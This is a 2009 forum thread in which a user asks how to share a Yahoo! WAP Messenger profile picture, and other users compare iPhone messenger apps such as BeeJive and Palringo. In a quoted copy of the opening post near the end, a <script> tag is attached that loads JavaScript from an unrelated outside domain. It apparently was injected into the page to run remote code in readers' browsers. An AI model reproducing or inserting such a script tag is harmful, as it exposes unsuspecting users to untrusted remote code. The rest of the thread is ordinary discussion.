I am using the Yahoo! Wap Messenger. I just wanted to know if anyone can tell me how to change my setting so my profile picture is available for the people that I am chatting with. Thanks
    2009-01-13 05:41 PM
    get it from the app store forfree
    2009-01-18 12:52 AM
    yahoo wap messenger? never heard. i'm a beejive user, and i think beejive is the best solution for all messengers. any followers?
    2009-01-19 04:07 AM
    yahoo wap messenger? never heard. i'm a beejive user, and i think beejive is the best solution for all messengers. any followers?
    i have to agree, it's the best solution, i can have yahoo and msn on at the same time then just enable backgrounder and i'm always on
    2009-01-25 02:12 PM
    i have to agree, it's the best solution, i can have yahoo and msn on at the same time then just enable backgrounder and i'm always on
    Same with Palringo. Honestly, I really don't see how BeeJive is the best. Palringo keeps you logged in up to 3 hours when BeeJive is 24 and you can do direct file transfer with BeeJive, but other than that, they're the same. :/

I don't need the above mentioned, and especially not for $16.
    2009-01-30 08:14 AM
    You can always try Pingerphone...
    2009-03-16 03:36 AM
    I am using the Yahoo! Wap Messenger. I just wanted to know if anyone can tell me how to change my setting so my profile picture is available for the people that I am chatting with. Thanks<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    Try to edit your Avatar and follow the prompt.
    2009-09-24 08:14 PM
LINK TO POST COPIED TO CLIPBOARD